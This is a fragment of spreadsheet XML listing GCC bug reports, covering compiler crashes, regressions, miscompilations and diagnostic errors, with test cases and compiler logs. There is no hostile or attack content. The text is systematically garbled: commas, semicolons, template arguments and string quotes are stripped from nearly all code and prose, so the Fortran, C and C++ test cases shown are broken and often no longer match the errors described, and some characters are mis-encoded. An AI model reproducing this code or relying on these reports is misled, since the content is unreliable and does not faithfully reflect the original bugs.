Es werden eingebaute Spezifikationen verwendet.
Ziel: x86_64-unknown-linux-gnu
Konfiguriert mit: ../4-4/configure --prefix=/home/ig25 --enable-languages=cfortran --with-mpc=/usr/local --with-mpfr=/usr/local
Thread-Modell: posix
gcc-Version 4.4.7 20110830 (prerelease) (GCC)</t>
  </si>
  <si>
    <t>GCC-33217</t>
  </si>
  <si>
    <t>[4.3 regression] ICE on INQUIRE in a module</t>
  </si>
  <si>
    <t>When I compile the module listed below using the version of gfortran for Linux dated August 27 (downloaded from http://gcc.gnu.org/wiki/GFortranBinaries) I get the following error:
p.f90: In function 'i':
p.f90:5: internal compiler error: in make_decl_rtl at varasm.c:1263
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
MODULE print_it
CONTAINS
  SUBROUTINE i()
    LOGICAL :: qexist
    INQUIRE (UNIT=1 EXIST=qexist)
  END SUBROUTINE i
END MODULE print_it</t>
  </si>
  <si>
    <t>GCC-700</t>
  </si>
  <si>
    <t>Internal compiler error while building PINE 4.30 on SPARC-Solaris</t>
  </si>
  <si>
    <t>While building PINE 4.30 (ftp://ftp.cac.washington.edu/pine/) gcc fails with an internal compiler error on mbx.c.
&gt; gcc -v
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/2.97/specs
Configured with:  --enable-shared --enable-multilib --enable-languages=c
gcc version 2.97 20001026 (experimental)
&gt; gcc -save-temps -c mbx.c -o mbx.o
mbx.c: In function `mbx_hdrpos':
mbx.c:1371: Unrecognizable insn:
(insn 110 108 112 (set (reg:SI 132)
        (minus:SI (const_int 4 [0x4])
            (const_int -4096 [0xfffff000]))) -1 (nil)
    (nil))
mbx.c:1371: Internal compiler error in  at recog.c:2162
   Please submit a full bug report.
   See  for instructions.
and
&gt; gcc -v
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/specs
gcc version 2.95.2 19991024 (release)
&gt; gcc -save-temps -c mbx.c -o mbx.o
mbx.c: In function `mbx_hdrpos':
mbx.c:1371: internal error--unrecognizable insn:
(insn 102 100 104 (set (reg:SI 130)
        (minus:SI (const_int 4 [0x4])
            (const_int -4096 [0xfffff000]))) -1 (nil)
    (nil))
Preprocessed mbx.i from gcc 20001026 included.
Release:
gcc-2.95.2(19991024 release) and gcc-2.97(20001026 experimental)
Environment:
sparc-sun-solaris2.7 and sparc-sun-solaris2.8
How-To-Repeat:
get and unpack ftp://ftp.cac.washington.edu/pine/pine4.30.tar.gz
cd pine4.30/imap/c-client
gcc -c mbx.c -o mbx.o</t>
  </si>
  <si>
    <t>GCC-4443</t>
  </si>
  <si>
    <t>Re: =?iso-8859-1?Q?other=2F4441:_can=B4t_build__=22execvp:_true:_Permission_?=</t>
  </si>
  <si>
    <t xml:space="preserve"> On Tue Oct 02 2001 at 06:18:12PM -0000 nwerneck@yahoo.com.br wrote:
 &gt; &gt;Description:
 &gt; IÂ´m trying to build the 3.0.1 but I get this execvp: true: Permission denied error message when I 'make' it.
 &gt; 
 &gt; In the start it was complaininng about true: Command not found. I dinÂ´t have a /bin/true program. So i created it (#!/bin/sh\nexit 1) and the make process could go on... But now it is stopping with this error.
 1)  'true' must exit with a zero status not a non-zero status.  A return
 code of 0 means success anything else means failure.  (You might be
 confusing this with the concept of truth in C where 0 is false and
 non-zero is true.  It's a bit confusing but remember that one is Unix
 process exit status and the other is C interger/boolean value.)
 2)  If you're missing the shellutils package your Debian system is in
 trouble.  You should probably do a whole bunch of 'apt-get dist-upgrade'
 before trying to build a compiler.  In addition to simple commands like
 'true' and 'false' shellutils also contains 'uname' which is critical for
 the GCC installation scripts to figure out what kind of system you're using.
 &gt; (well I havenÂ´t tried with any other computers... so it can be just me :/ )
 Sorry it's just you.  :-)
 Phil
 -- 
 If ye love wealth greater than liberty the tranquility of servitude greater
 than the animating contest for freedom go home and leave us in peace.  We seek
 not your counsel nor your arms.  Crouch down and lick the hand that feeds you
 and may posterity forget that ye were our countrymen.            - Samuel Adams
Release:
unknown
Unformatted:
  =?iso-8859-1?Q?denied=22?=</t>
  </si>
  <si>
    <t>pedwards</t>
  </si>
  <si>
    <t>GCC-51798</t>
  </si>
  <si>
    <t>[4.7 regression] libstdc++ atomicity performance regression due to __sync_fetch_and_add</t>
  </si>
  <si>
    <t>libstdc++ uses __sync_fetch_and_add() to provide atomicity for reference counting.  The semantics of __sync_fetch_and_add() were not explicitly stated.  libstdc++ apparently requires ACQUIRE semantics for incrementing the reference count and RELEASE semantics for decrementing the reference and possibly destroying the object.  The libstdc++ code did not make this distinction but __sync_fetch_and_add() generally was implemented as RELEASE semantics which was overkill for increment and appropriate for decrement/destroy.
As part of the C++11 memory model changes __sync_fetch_and_add() atomicity was changed to use the new more general atomicity infrastructure with SEQUENTIAL CONSISTENCY.  This imposes the most strict and heavy-weight barrier.
On architectures with granularity and gradations in the implementation of atomic instructions this introduces a severe performance regression.</t>
  </si>
  <si>
    <t>GCC-43496</t>
  </si>
  <si>
    <t>gcc.target/powerpc/gcse-1.c fails on powerpc-unknown-linux-gnu with -fpic/-fPIC</t>
  </si>
  <si>
    <t>When running the testsuite on powerpc-unknown-linux-gnu with extra passes
containing -fpic/-fPIC I get the following additional error:
   FAIL: gcc.target/powerpc/gcse-1.c scan-assembler-times @ha 1
The error happens on the 4.3/4.4 branches and 4.5 trunk:
http://gcc.gnu.org/ml/gcc-testresults/2010-03/msg01996.html
http://gcc.gnu.org/ml/gcc-testresults/2010-03/msg01913.html
http://gcc.gnu.org/ml/gcc-testresults/2010-03/msg01630.html
The pattern @ha appears zero times in the pic assembler output.  I don't speak ppc so is this expected or is it a GCC bug?</t>
  </si>
  <si>
    <t>GCC-18565</t>
  </si>
  <si>
    <t>gfortran: CONJG: false error message about standard violation</t>
  </si>
  <si>
    <t>Hi
the following program gives a false error message when compiled
with gfortran -std=f95:
integer parameter :: dp = kind (1.d0)
complex(dp) :: z1 z2
z1 = (0._dp 1._dp)
z2 = conjg (z1)
print * z1 z2
end
I get:
 In file gfcbug21.f90:4
z2 = conjg (z1)
           1
Error: Type of argument 'z' in call to 'conjg' at (1) should be COMPLEX(4) not
COMPLEX(8)
This is clearly wrong.  According to my copy of Metcalf&amp;Reid
CONJG is a generic elemental function.
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-56701</t>
  </si>
  <si>
    <t>[C++11] The *this* pointer fails to bind to rvalue reference to pointer type</t>
  </si>
  <si>
    <t>The following fails to compile with gcc 4.8.0:
struct A
{
  void f(){ A* }
}
int main(){}
Error messages:
error: invalid initialization of reference of type 'A*&amp;&amp;' from expression of type 'A* const'
void f(){ A* }
According to 9.3.2p1 the this pointer is a prvalue of type A* not A* const as the error message suggests.</t>
  </si>
  <si>
    <t>GCC-81308</t>
  </si>
  <si>
    <t>[8 regression] ICE in calc_dfs_tree at dominance.c:458</t>
  </si>
  <si>
    <t>Between 20170702 (r249882) and 20170703 (r249926) the g++.dg/pr62079.C testcase
started to FAIL on i386-pc-solaris2.12 (32-bit only) and according to gcc-testresults
on i586-unknown-freebsd10.3:
+FAIL: g++.dg/pr62079.C   (internal compiler error)
+FAIL: g++.dg/pr62079.C   (test for excess errors)
Excess errors:
during RTL pass: split2
/vol/gcc/src/hg/trunk/local/gcc/testsuite/g++.dg/pr62079.C:78:1: internal compiler error: in calc_dfs_tree at dominance.c:458
0x8d51fc6 calc_dfs_tree
        /vol/gcc/src/hg/trunk/local/gcc/dominance.c:458
0x8d50acb calculate_dominance_info(cdi_direction)
        /vol/gcc/src/hg/trunk/local/gcc/dominance.c:734
0x8ce81db find_partition_fixes
        /vol/gcc/src/hg/trunk/local/gcc/cfgrtl.c:2312
0x8ceb4a7 rtl_verify_edges
        /vol/gcc/src/hg/trunk/local/gcc/cfgrtl.c:2605
0x8ceb4a7 rtl_verify_flow_info_1
        /vol/gcc/src/hg/trunk/local/gcc/cfgrtl.c:2756
0x8cebbbd rtl_verify_flow_info
        /vol/gcc/src/hg/trunk/local/gcc/cfgrtl.c:2996
0x8cd795f verify_flow_info()
        /vol/gcc/src/hg/trunk/local/gcc/cfghooks.c:257
0x909f77c checking_verify_flow_info
        /vol/gcc/src/hg/trunk/local/gcc/cfghooks.h:198
0x909f77c split_all_insns()
        /vol/gcc/src/hg/trunk/local/gcc/recog.c:2992
0x909f79a execute
        /vol/gcc/src/hg/trunk/local/gcc/recog.c:3890
  Rainer</t>
  </si>
  <si>
    <t>GCC-14084</t>
  </si>
  <si>
    <t>Reg allocator incorrectly changes REG_OFFSET</t>
  </si>
  <si>
    <t>On ppc64 and probably all 64-bit big endian machines
global register allocator IMHO wrongly changes REG_EXPR of an int variable
stored in 64-bit when compiling attached testcase (even at -O0).
In the following example repcount is a 32-bit int variable
subreg:SI (reg:DI 118 [ repcount ]) 4)) is changed into
(reg:SI 0 0 [orig:118 repcount+4 ] [118]))
Note that repcount is only 4 bytes wide so offset 4 makes no sense.
lreg:
(insn 4 3 5 0 (set (reg:SI 119 [ repcount ])
        (subreg:SI (reg:DI 118 [ repcount ]) 4)) 303 {*movsi_internal1} (nil)
    (expr_list:REG_DEAD (reg:DI 118 [ repcount ])
        (nil))) 
greg:
(insn 4 3 5 0 (set (reg:SI 0 0 [orig:119 repcount ] [119])
        (reg:SI 0 0 [orig:118 repcount+4 ] [118])) 303 {*movsi_internal1} (nil)
    (nil))
This makes variable tracking think that there are two parts of that variable.</t>
  </si>
  <si>
    <t>GCC-5527</t>
  </si>
  <si>
    <t>incorrect support for infinity in `numeric_limits' on Linux/Intel</t>
  </si>
  <si>
    <t xml:space="preserve">	infinity definition in `numeric_limits' for `float' and `double'
        is missing on the platform while it obviously should not
Release:
3.0.3
Environment:
System: Linux localhost 2.2.14-5.0 #19 Tue Jul 24 02:12:27 NOVST 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc-3.0.3/configure --enable-languages=cc++ --disable-nls
How-To-Repeat:
See attachments for nlimits_bug.ii.bz2
</t>
  </si>
  <si>
    <t>coola</t>
  </si>
  <si>
    <t>GCC-51424</t>
  </si>
  <si>
    <t>[C++11] G++ should diagnose self-delegating constructors</t>
  </si>
  <si>
    <t>This modification of g++.dg/template/meminit1.C should get a diagnostic in C++11 mode as well:
template 
struct S
{
  S() : S() {} // { dg-message delegating constructors  { target c++98 } }
  // { dg-error delegates to itself  { target c++11 } }
}
S s
because 12.6.2 says
If a constructor delegates to itself directly or indirectly the program is
ill-formed no diagnostic is required.
The diagnostic is not required but it is easy to give so we should do so.</t>
  </si>
  <si>
    <t>GCC-25224</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in initialize_original_copy_tables</t>
  </si>
  <si>
    <t>Testcase compile with -O2 -funswitch-loops:
static float rgam
extern void *jmp(void *)
void drotmg(float d1) {
void *labels[] = { 
  for() {
    goto *jmp(labels)
    if (d1 &lt;= rgam)
      goto L170
L170:
    if (d1 &lt;= rgam)
      goto L170
  }
L180:
  goto L170
}</t>
  </si>
  <si>
    <t>GCC-30132</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE in find_lattice_value at tree-complex.c:133</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/400484]
seen on i486-linux-gnu with 3.4 4.1.2 4.3 20061022 works with -O0
$ gcc -c -O1 complex.c 
complex.c: In function 'testit':
complex.c:4: internal compiler error: in find_lattice_value at tree-complex.c:133
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-6809</t>
  </si>
  <si>
    <t>GCC 3.1 cc1 crashes if -fverbose-asm is specified</t>
  </si>
  <si>
    <t>CC1 crashes if -fverbose-asm is specified when compiling the included C source code.
$ gcc -fverbose-asm bugfva.c
bugfva.c: In function `sum_li':
bugfva.c:22: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.1
Environment:
Windows NT 4.0 SP6 Pentium III (Coppermine) 850 MHz Cygwin
How-To-Repeat:
Compile attached file:
gcc -fverbose-asm bugfva.c</t>
  </si>
  <si>
    <t>vacb4</t>
  </si>
  <si>
    <t>GCC-66940</t>
  </si>
  <si>
    <t>ifcvt.c:1907 signed integer overflow</t>
  </si>
  <si>
    <t>/* must be compiled with -O */
/* in noce_get_alt_condition */
/*gcc-5.2.0/gcc/ifcvt.c:1907: runtime error: signed integer overflow: 9223372036854775807 + 1 cannot be represented in type 'long int'*/
/* gcc source line if (actual_val == desired_val + 1)*/
/* double check with gcc_assert(desired_val+1&gt;desired_val) immediately before*/
long foo(void)
{
 long ival = 0
 int cp 
 if (cp) ival = -1
 if (ival &lt; 0)   return -0x7fffffffffffffffL - 1     
 return 0x7fffffffffffffffL
}</t>
  </si>
  <si>
    <t>GCC-42501</t>
  </si>
  <si>
    <t>[4.4 only] Code bloating on operations with bit fields</t>
  </si>
  <si>
    <t>Alexvod tried pr31849-patch from http://gcc.gnu.org/bugzilla/show_bug.cgi?id=31849. It changed result size from 72 to 68 below but still didn't eliminated the loop counter below.
See the following code
// compilation options: -march=armv5te -mthumb -Os
struct tree_block
{
 unsigned handler_block_flag:2
 unsigned block_num:30
}
static int next_block_index = 2
void number_blocks (int n_blocks struct tree_block **block_vector)
{
 int i
 for (i = 0 i &lt; n_blocks ++i)
   ((block_vector[i])-&gt;block_num) = next_block_index++
}
is compiled by gcc 4.4.0 in very inefficient way. gcc 4.2.1 compiles it to 48 bytes and gcc 4.4.0 to 72 bytes (1.5 times bigger).
Analysis of assembly files shows the following problems:
1) operations with bitfields are done inefficiently. gcc-4.2.1 sets block_num by LSLing the value and ORRing it.gcc-4.4.0 loads an extra constant 0x3fffffff from memory and does AND in addition to that LSL and ORR.
2) gcc-4.4.0 doesn't eliminate loop counter i. It increments both block_vector and i. Instead gcc-4.2.1 computes the end of the loop and increments only block_vector
3) register allocation performs badly it spills some registers to stack which causes extra LDR STR operations in the loop body
The code was taken from GCC SPEC benchmark.</t>
  </si>
  <si>
    <t>GCC-36990</t>
  </si>
  <si>
    <t>[4.4 Regression] -fipa-cp vs function pointers and extern template</t>
  </si>
  <si>
    <t>I mkdir a directory named build in the gcc directory  then run configure and make in it.
gcc -c -DHAVE_CONFIG_H  -O -fipa-cp  -I. -I../../libiberty/../include  ../../libiberty/hashtab.c
../../libiberty/hashtab.c:955: internal compiler error: in fold_convert at fold-const.c:2529
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-59054</t>
  </si>
  <si>
    <t>Powerpc -O0 -mcpu=power7 generates sub-optimal code to load 0</t>
  </si>
  <si>
    <t>After the changes in early October went in if you use -O0 and compile code to load up 0 the compiler decides to generate the 0 in a VSX register store it on the stack and then reload it to a GPR rather than doing a load immediate of 0.</t>
  </si>
  <si>
    <t>GCC-81900</t>
  </si>
  <si>
    <t>[8 Regression] GCC trunk miscompiles Perl / __sigsetjmp issue</t>
  </si>
  <si>
    <t>Created attachment 42007
creduce-minimized test case
Hi
I'm having trouble running a GCC/trunk-compiled Perl I first noticed
the problem on my WebAssembly port but I think I can reproduce it on
x86_64 built from the standard GCC tree. I also think this is a GCC
bug.
After some editing I've managed to generate a (somewhat) minimized
testcase:
Perl_croak() __attribute__((noreturn))
*Perl_sv_gets()
a() {
  __sigsetjmp()
  char *b
  if ((b = Perl_sv_gets()) == 0)
    Perl_croak(No Perl script found in input\n)
  if (*b == '#')
    __asm__( : : (badbad))
}
The intended behaviour is that Perl_sv_gets() can return a NULL
pointer in which case the pointer isn't dereferenced and Perl_croak()
is called instead.  However the assembly output I get is:
	xorl	%eax %eax
	call	__sigsetjmp
	xorl	%eax %eax
	call	Perl_sv_gets
	cmpb	$35 (%rax)
The call to Perl_croak has been removed and the return value of
Perl_sv_gets() is unconditionally dereferenced.  That's wrong right?
I'm compiling with:
$ ~/git/asmjs/subrepos/gcc/host-x86_64-pc-linux-gnu/gcc/xgcc -B /home/pip/git/asmjs/subrepos/gcc/host-x86_64-pc-linux-gnu/gcc/ -v -S -DPERL_CORE -fwrapv -std=c89 -O3 -fno-strict-aliasing -w -Wfatal-errors testcase.i -o tmp.s || exit 1
Reading specs from /home/pip/git/asmjs/subrepos/gcc/host-x86_64-pc-linux-gnu/gcc/specs
COLLECT_GCC=/home/pip/git/asmjs/subrepos/gcc/host-x86_64-pc-linux-gnu/gcc/xgcc
Target: x86_64-pc-linux-gnu
Configured with: ./configure --target=x86_64-pc-linux-gnu --disable-bootstrap --enable-languages=c
Thread model: posix
gcc version 8.0.0 20170819 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-B' '/home/pip/git/asmjs/subrepos/gcc/host-x86_64-pc-linux-gnu/gcc/' '-v' '-S' '-D' 'PERL_CORE' '-fwrapv' '-std=c90' '-O3' '-fno-strict-aliasing' '-w' '-Wfatal-errors' '-o' 'tmp.s' '-mtune=generic' '-march=x86-64'
 /home/pip/git/asmjs/subrepos/gcc/host-x86_64-pc-linux-gnu/gcc/cc1 -fpreprocessed testcase.i -quiet -dumpbase testcase.i -mtune=generic -march=x86-64 -auxbase-strip tmp.s -O3 -Wfatal-errors -w -std=c90 -version -fwrapv -fno-strict-aliasing -o tmp.s
GNU C89 (GCC) version 8.0.0 20170819 (experimental) (x86_64-pc-linux-gnu)
	compiled by GNU C version 6.4.0 20170724 GMP version 6.1.2 MPFR version 3.1.5 MPC version 1.0.3 isl version none
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C89 (GCC) version 8.0.0 20170819 (experimental) (x86_64-pc-linux-gnu)
	compiled by GNU C version 6.4.0 20170724 GMP version 6.1.2 MPFR version 3.1.5 MPC version 1.0.3 isl version none
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: d531daafd687d9500452e3b103d32887
COMPILER_PATH=/home/pip/git/asmjs/subrepos/gcc/host-x86_64-pc-linux-gnu/gcc/
LIBRARY_PATH=/home/pip/git/asmjs/subrepos/gcc/host-x86_64-pc-linux-gnu/gcc/:/lib/x86_64-linux-gnu/:/lib/../lib64/:/usr/lib/x86_64-linux-gnu/:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-B' '/home/pip/git/asmjs/subrepos/gcc/host-x86_64-pc-linux-gnu/gcc/' '-v' '-S' '-D' 'PERL_CORE' '-fwrapv' '-std=c90' '-O3' '-fno-strict-aliasing' '-w' '-Wfatal-errors' '-o' 'tmp.s' '-mtune=generic' '-march=x86-64'
The call to sigsetjmp appears to be necessary to trigger the bug.
Sorry if this is a duplicate or a known issue right now I don't have
the time to investigate further. The call appears to be eliminated in a tree optimization pass so I'm tentatively choosing that component.</t>
  </si>
  <si>
    <t>pipcet</t>
  </si>
  <si>
    <t>GCC-4731</t>
  </si>
  <si>
    <t>SPARC gives wrong output on simple combination of Fortran main program and C functions</t>
  </si>
  <si>
    <t>This Fortran main program:
      PROGRAM TEST_G77
      REAL*4 PRINT_A
      REAL*4 TEST_GCC
      REAL*4 S V T
      REAL*8 PRINT_DA
      REAL*8 TEST_DGCC
      REAL*8 DS DV DT
      T = 20.0
      S = TEST_GCC(T)
      WRITE(*'(A F16.5 3X Z8)') S =  S S
      WRITE(*'(A F16.5 3X Z8)') T =  T T
      DT = 20.0
      DS = TEST_DGCC(DT)
      WRITE(*'(A F16.5 3X Z16)') DS =  DS DS
      WRITE(*'(A F16.5 3X Z16)') DT =  DT DT
      END
combined with these C functions:
float test_gcc_(float *b)
{
  float a
  a = 10.0
  printf(a=%f (%#x)\naa)
  printf(b=%f (%#x)\n*b*b)
  return(a)
}
double test_dgcc_(double *db)
{
  double da
  da = 10.0
  printf(da=%f (%#x)\ndada)
  printf(db=%f (%#x)\n*db*db)
  return(da)
}
float print_a_(float *a)
{
  printf(A = %f (%#x)\n *a *a)
  return(0)
}
double print_da_(double *da)
{
  printf(DA = %f (%#x)\n *da *da)
  return(0)
}
give the wrong output:
a=10.000000 (0x40240000)
b=20.000000 (0x40340000)
S =     524288.00000   49000000
T =         20.00000   41A00000
da=10.000000 (0x40240000)
db=20.000000 (0x40340000)
DS =         10.00000   4024000000000000
DT =         20.00000   4034000000000000
[ The first value of S should be 10.00000 ]
Release:
GCC 3.0.1
Environment:
SPARC Solaris 8
uname -a
SunOS mumble 5.8 Generic_108528-10 sun4u sparc SUNWSun-Blade-100
How-To-Repeat:
g77 -o bla fortran.f c.c</t>
  </si>
  <si>
    <t>GCC-51223</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE with invalid function parameter</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.5.0:
==========================
struct A
{
  A foo(void i = 0)
}
void bar()
{
  A().foo()
}
A A::foo(void i)
{
  return A()
}
==========================
bug.cc:3:18: error: 'i' has incomplete type
bug.cc:3:19: error: invalid use of 'void'
bug.cc: In function 'void bar()':
bug.cc:8:11: error: call to 'A A::foo()' uses the default argument for parameter 1 which is not yet defined
bug.cc: At global scope:
bug.cc:11:15: error: 'i' has incomplete type
bug.cc:11:16: error: invalid use of 'void'
bug.cc: In function 'void bar()':
bug.cc:8:11: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in useless_type_conversion_p at tree-ssa.c:1460
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-37260</t>
  </si>
  <si>
    <t>[4.3 Regression] infinite loop in init</t>
  </si>
  <si>
    <t>gcc version 4.4.0 20080827 (experimental) [trunk revision 138965] (GCC) 
produces:
/tmp/t.cc:9: error: initializer for â€˜pthread_once_tâ€™ must be brace-enclosed
/tmp/t.cc:9: error: initializer for â€˜pthread_once_tâ€™ must be brace-enclosed
/tmp/t.cc:9: error: initializer for â€˜pthread_once_tâ€™ must be brace-enclosed
/tmp/t.cc:9: error: initializer for â€˜pthread_once_tâ€™ must be brace-enclosed
/tmp/t.cc:9: error: initializer for â€˜pthread_once_tâ€™ must be brace-enclosed
/tmp/t.cc:9: error: initializer for â€˜pthread_once_tâ€™ must be brace-enclosed
/tmp/t.cc:9: error: initializer for â€˜pthread_once_tâ€™ must be brace-enclosed
[...]
for
struct pthread_once_t { }
struct test {
  pthread_once_t once
}
int main(void) {
  struct test foo = {
    once: PTHREAD_ONCE_INITIALIZER
  }
  return 0
}
:-(</t>
  </si>
  <si>
    <t>GCC-65598</t>
  </si>
  <si>
    <t>Fix column location for 'explicit'</t>
  </si>
  <si>
    <t>Created attachment 35160
Preprocessed source
System report:
OS: GNU/Linux x86_64
Distribution: openSUSE 13.1
Package info:
  Informationen fÃ¼r Paket gcc49-c++:
  ----------------------------------
  Repository: @System
  Name: gcc49-c++
  Version: 4.9.1+r213409-44.1
  Arch: x86_64
  Anbieter: obs://build.opensuse.org/devel:gcc
  Installiert: Ja
  Status: aktuell
  Installierte GrÃ¶ÃŸe: 173 MiB
  Zusammenfassung: The GNU C++ Compiler
  Beschreibung: 
  This package contains the GNU compiler for C++.
Test program (C++11):
  struct ExplicitTest
  {
      explicit operator bool() const
  }
  explicit ExplicitTest::operator bool() const
  {
      return true
  }
The program is ill-formed because explicit is only allowed inside a class definition as per Â§7.1.2/6 Function Specifiers [N3376]. However the error message is misleading and seems not to have been updated for C++11 where explicit conversion operators were introduced:
$ g++-4.9 -c -std=c++11 explicit_operator_bool.cxx
explicit_operator_bool.cxx:6:40: error: only declarations of constructors can be â€˜explicitâ€™
 explicit ExplicitTest::operator bool() const
                                        ^
(Also it would probably be better to place the caret underneath explicit.)</t>
  </si>
  <si>
    <t>arvo</t>
  </si>
  <si>
    <t>GCC-9795</t>
  </si>
  <si>
    <t>[3.4 regression] botched name lookup in templates</t>
  </si>
  <si>
    <t>Resulting from a typo...
This should absolutely not compile:
-----------------------------
struct A
template  int f() { return A::a }
int main () {
  return f()
}
-----------------------------
A has no member A::a. However present 3.4 happily groks
this and returns '0'. Don't anybody ask me what's going
on here...
W:
Release:
gcc-3.4
Environment:
present 3.4 3.3 not affected</t>
  </si>
  <si>
    <t>GCC-37819</t>
  </si>
  <si>
    <t>[4.4 Regression] ice for bitfield code</t>
  </si>
  <si>
    <t>I just tried to compile the Suse Linux package kmymoney-0.8.9-23
with the new gcc version 4.4 snapshot dated 20081010.
The compiler said
kmymoneyaccountselector.cpp: In member function 'bool kMyMoneyCheckListItem::isAlternate()':
kmymoneyaccountselector.cpp:149: internal compiler error: in cp_genericize_r at cp/cp-gimplify.c:823
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. No special flags required.</t>
  </si>
  <si>
    <t>GCC-28797</t>
  </si>
  <si>
    <t>Problems with demangling (__cxa_demangle())</t>
  </si>
  <si>
    <t>I used a simple program which calls __cxa_demangle function. These mangled
names were demangled wrong:
_Z1fA37_iPS_ -&gt; f(int [37] int (*) [37]) should be: f(int[37] int (*) [37])
_Z1fILi2EEvRAplplT_Li3ELi1E_i -&gt; void f(int (&amp;) [((2) + (3)) + (1)]) should be: void f(int (&amp;) [((2)+(3))+(1)])
_Z1fM1AKiPKS1_ -&gt; _Z1fM1AKiPKS1_ should be: f(int const A::* int const A::* const*)
_Z3absILd1c1f1496f8a44219EEvv -&gt; void abs() should be: void abs()
_Z3absILd40092acd9e83e426EEvv -&gt; void abs() should be: void abs()			
_Z3absILe08042191a6cc56a2fe117becEEvv -&gt; void abs() should be: void abs()
_Z3absILe804bfff8000000000000000EEvv -&gt; void abs() should be: void abs()			
_Z3absILf4016147bEEvv -&gt; void abs() should be: void abs()			
_Z3absILfc1800000EEvv -&gt; void abs() should be: void abs()			
_Z3fooA30_A_i -&gt; foo(int [30][]) should be: foo(int[30][])
_Z9function1PVKiPViPKiPi -&gt; function1(int const volatile* int volatile* int const* int*) should be: function1(int volatile const* int volatile* int const* int*)
_Z9function2PVKiPViPKiRS_RS1_RS3_ -&gt; function2(int const volatile* int volatile* int const* int const volatile&amp; int volatile&amp; int const&amp;) should be: function2(int volatile const* int volatile* int const* int volatile const&amp; int volatile&amp; int const&amp;)
_Z9function4PVKi -&gt; function4(int const volatile*) should be: function4(int volatile const*)
_Z9function5PVKi -&gt; function5(int const volatile*) should be: function5(int volatile const*)
_Z9function6PVKiS0_ -&gt; function6(int const volatile* int const volatile*) should be: function6(int volatile const* int volatile const*)
_Z9functionjj -&gt; functionj(unsigned int) should be functionj(unsigned)
_ZlsRKU3fooU4bart1XS0_ -&gt; operator&lt;&lt;(X bart foo const&amp; X bart) should be: operator&lt;&lt;(X const foo bart&amp; X const foo bart)
_ZN3FooIA4_iE3barE -&gt; Foo::bar should be: Foo::bar
_Znaj -&gt; operator new[](unsigned int) should be: operator new[](unsigned)
_ZngILi42EEvN1AIXplT_Li2EEE1TE -&gt; void operator-(A::T) should be: void operator-(A::T)
_ZngILi42EEvN1AIXplT_Li2EEEE -&gt; void operator-(A) should be: void operator-(A)
_ZNSsC1EPKcRKSaIcE -&gt; std::basic_string std::allocator &gt;::basic_string(char const* std::allocator const&amp;) should be: std::string::string(char const* std::allocator const&amp;)
_Znwj -&gt; operator new(unsigned int) should be: operator new(unsigned)
_ZTv0_n16_NSoD0Ev -&gt; virtual thunk to std::basic_ostream &gt;::~basic_ostream() should be: virtual thunk to std::ostream::~ostream()
These issues you can reproduce on Mac OS IA32 Linux and EM64T Linux
Environment: IA32 and EM64T Linux: Red Hat Enterprise Linux WS release 4 (Nahant Update 3) Release: gcc version 3.4.5 20051201 (Red Hat 3.4.5-2)
Environment: Mac OS
Release: 
gcc -v
Using built-in specs.
Target: i686-apple-darwin8
Configured with: /private/var/tmp/gcc/gcc-5341.obj~1/src/configure --disable-checking -enable-werror --prefix=/usr --mandir=/share/man --enable-languages=cobjcc++obj-c++ --program-transform-name=/^[cg][^.-]*$/s/$/-4.0/ --with-gxx-include-dir=/include/c++/4.0.0 --with-slibdir=/usr/lib --build=powerpc-apple-darwin8 --with-arch=pentium-m --with-tune=prescott --program-prefix= --host=i686-apple-darwin8 --target=i686-apple-darwin8
Thread model: posix
gcc version 4.0.1 (Apple Computer Inc. build 5341)
How-To-Repeat:
Feed those mangled names to __cxa_demangle() function and check the results of
demangling.
This report is very close to Bug#:7986.</t>
  </si>
  <si>
    <t>kurkov</t>
  </si>
  <si>
    <t>GCC-10356</t>
  </si>
  <si>
    <t>Gigi abort Code=104</t>
  </si>
  <si>
    <t>$ gnatmake e
gcc-3.2 -c e.adb
+===========================GNAT BUG DETECTED==============================+
| 3.2.3 20030309 (prerelease) (i386-pc-linux-gnu) Gigi abort Code=104     |
| Error detected at e.adb:7:20                                             |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc-3.2 or gnatmake command that you entered.          |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
e.adb
cmd.ads
compilation abandoned
gnatmake: e.adb compilation error
Compilation exited abnormally with code 4 at Wed Apr  9 00:22:08
Release:
gcc version 3.2.3 20030309 (Debian prerelease)
Environment:
Debian GNU/Linux (testing) i86
Linux strudel 2.4.18-xfs #3 Wed Aug 21 20:30:45 CEST 2002 i686 unknown unknown
How-To-Repeat:
gnatmake e</t>
  </si>
  <si>
    <t>GCC-47492</t>
  </si>
  <si>
    <t>[trans-mem] Problem with memset() inside transaction_safe function</t>
  </si>
  <si>
    <t>Created attachment 23141
testcase
When I call memset() function from an __attribute__((transaction_safe)) function I get compilation error.
testcase.c:10:2: error: unsafe function call 'memset' within 'transaction_safe' function
According to Intel TM ABI the memset() function is managed by the compiler and it should be automatically transformed to be transaction safe.
I have attached an example.</t>
  </si>
  <si>
    <t>vasilis.karakostas</t>
  </si>
  <si>
    <t>GCC-15073</t>
  </si>
  <si>
